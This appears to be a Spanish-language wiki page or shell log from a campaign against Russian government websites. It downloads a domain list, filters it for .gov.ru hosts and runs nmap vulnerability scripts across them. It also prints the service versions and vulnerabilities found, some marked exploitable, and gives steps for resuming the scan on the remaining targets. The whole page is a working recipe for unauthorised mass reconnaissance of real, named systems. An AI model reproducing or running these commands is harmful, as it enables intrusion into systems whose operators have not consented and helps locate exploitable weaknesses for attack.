rusia@dictadura:$ curl https://wiki.acosadores.net/lib/exe/fetch.php?media=rusia:urls_ips_ru_recon_ng.tar.gz -o urls_ips_ru_recon_ng.tar.gz % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 35645 100 35645 0 0 132k 0 --:--:-- --:--:-- --:--:-- 133k
nmap a los puertos más comunes y vulnerables
rusia@dictadura:$ nmap -Pn -p 20-23,69,139,137,445,53,443,80,8080,8443 -sV --script vuln $(gunzip -c urls_ips_ru_recon_ng.tar.gz | grep -aiEo '([a-z]+\.){2,3}ru' | sort | uniq | grep -E '.*\.gov\..*') -oN nmap_vuln_ru_pcomunes.txt rusia@dictadura:$ gzip nmap_vuln_ru_pcomunes.txt rusia@dictadura:$ mv nmap_vuln_ru_pcomunes.txt.gz nmap_vuln_ru_pcomunes_parte1.txt.gz
nmap_vuln_ru_pcomunes_parte1.txt.gz
Servicios abiertos y cerrados con sus diferentes versiones
rusia@dictadura:$ gunzip -c nmap_vuln_ru_pcomunes_parte1.txt.gz | grep -Ex '^[0-9]+\/.*open.*' | sed -E 's/ {2,}/ /g' | sort | uniq 21/tcp open ftp? 21/tcp open ftp ProFTPD 1.3.5e 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh Cisco SSH 1.25 (protocol 2.0) 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) 443/tcp open ssl/http Apache httpd 443/tcp open ssl/http Apache httpd 2.2.15 443/tcp open ssl/http ASP.NET 4.0.30319 (MVC 5.3) 443/tcp open ssl/http nginx 443/tcp open ssl/http nginx 1.16.1 443/tcp open ssl/http nginx 1.18.0 443/tcp open ssl/http nginx 1.20.1 443/tcp open ssl/http nginx 1.22.0 443/tcp open ssl/http nginx 1.22.1 443/tcp open ssl/http nginx 1.23.1 443/tcp open ssl/http nginx 1.24.0 443/tcp open ssl/http nginx 1.26.0 443/tcp open ssl/http nginx 1.26.2 443/tcp open ssl/http nginx 1.27.3 443/tcp open ssl/http nginx (reverse proxy) 443/tcp open ssl/http-proxy HAProxy http proxy 1.3.1 or later 443/tcp open ssl/https 443/tcp open ssl/https? 443/tcp open ssl/https ddos-guard 443/tcp open ssl/https nginx 443/tcp open ssl/https WEBrick/1.3.1 (Ruby/2.4.5/2018-10-18) 443/tcp open ssl/https webserver 443/tcp open ssl/ssl Apache httpd (SSL-only mode) 443/tcp open tcpwrapped 53/tcp open domain? 53/tcp open domain dnsmasq 2.84rc2 53/tcp open domain (generic dns response: NOTIMP) 53/tcp open domain ISC BIND 9.11.3-1ubuntu1.13 (Ubuntu Linux) 53/tcp open domain ISC BIND 9.18.28-1~deb12u2 (Debian Linux) 8080/tcp open http Apache httpd 2.4.38 ((Debian)) 8080/tcp open http-proxy 80/tcp open http 80/tcp open http? 80/tcp open http Apache httpd 80/tcp open http Apache httpd 2.2.15 80/tcp open http Apache httpd 2.4.29 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1i PHP/7.3.7) 80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips) 80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34) 80/tcp open http Citrix NetScaler httpd 80/tcp open http ddos-guard 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) 80/tcp open http Microsoft IIS httpd 8.5 80/tcp open http nalog.ru 80/tcp open http nginx 80/tcp open http nginx 1.14.2 80/tcp open http nginx 1.18.0 80/tcp open http nginx 1.18.0 (Ubuntu) 80/tcp open http nginx 1.20.2 80/tcp open http nginx 1.22.0 80/tcp open http nginx 1.22.1 80/tcp open http nginx 1.23.1 80/tcp open http nginx 1.24.0 80/tcp open http nginx 1.26.2 80/tcp open http nginx (reverse proxy) 80/tcp open http-proxy (bad gateway) 80/tcp open http-proxy HAProxy http proxy 1.3.1 or later 80/tcp open ssl/http nginx 1.26.2 80/tcp open tcpwrapped 8443/tcp open ssl/http nginx 8443/tcp open ssl/https-alt rusia@dictadura:$ gunzip -c nmap_vuln_ru_pcomunes_parte1.txt.gz | grep -Ex '^[0-9]+\/.*closed.*' | sed -E 's/ {2,}/ /g' | sort | uniq 20/tcp closed ftp-data 21/tcp closed ftp 22/tcp closed ssh 23/tcp closed telnet 443/tcp closed https 445/tcp closed microsoft-ds 53/tcp closed domain 69/tcp closed tftp 8080/tcp closed http-proxy 80/tcp closed http 8443/tcp closed https-alt rusia@dictadura:$
Vulnerabilidades encontradas y estados de cada una
rusia@dictadura:$ gunzip -c nmap_vuln_ru_pcomunes_parte1.txt.gz | sed -nE '/VULNERABLE:/{n;p}' | sort | uniq | Apache byterange filter DoS | Diffie-Hellman Key Exchange Incorrectly Generated Group Parameters | Diffie-Hellman Key Exchange Insufficient Group Strength | phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion | Slowloris DOS attack | SSL POODLE information leak rusia@dictadura:$ rusia@dictadura:$ gunzip -c nmap_vuln_ru_pcomunes_parte1.txt.gz | sed -nE '/VULNERABLE:/{n;n;p}' | sort | uniq | State: LIKELY VULNERABLE | State: UNKNOWN (unable to test) | State: VULNERABLE | State: VULNERABLE (Exploitable) rusia@dictadura:$
El escaner se detuvo en msp.alania.gov.ru, para poder intentar continuar y completar el escaner hay que buscar el número de línea con
gunzip -c urls_ips_ru_recon_ng.tar.gz | grep -aiEo '([a-z]+\.){2,3}ru' | sort | uniq | grep -E '.*\.gov\..*' | less -N /msp.alania.gov.ru
Una vez sabemos el número de línea sacamos las urls restantes hasta el final del archivo
gunzip -c urls_ips_ru_recon_ng.tar.gz | grep -aiEo '([a-z]+\.){2,3}ru' | sort | uniq | grep -E '.*\.gov\..*' | sed -n '427,$p'
Último paso
rusia@dictadura:$ nmap -Pn -p 20-23,69,139,137,445,53,443,80,8080,8443 -sV --script vuln $(gunzip -c urls_ips_ru_recon_ng.tar.gz | grep -aiEo '([a-z]+\.){2,3}ru' | sort | uniq | grep -E '.*\.gov\..*' | sed -n '427,$p') -oN nmap_vuln_ru_pcomunes_parte2.txt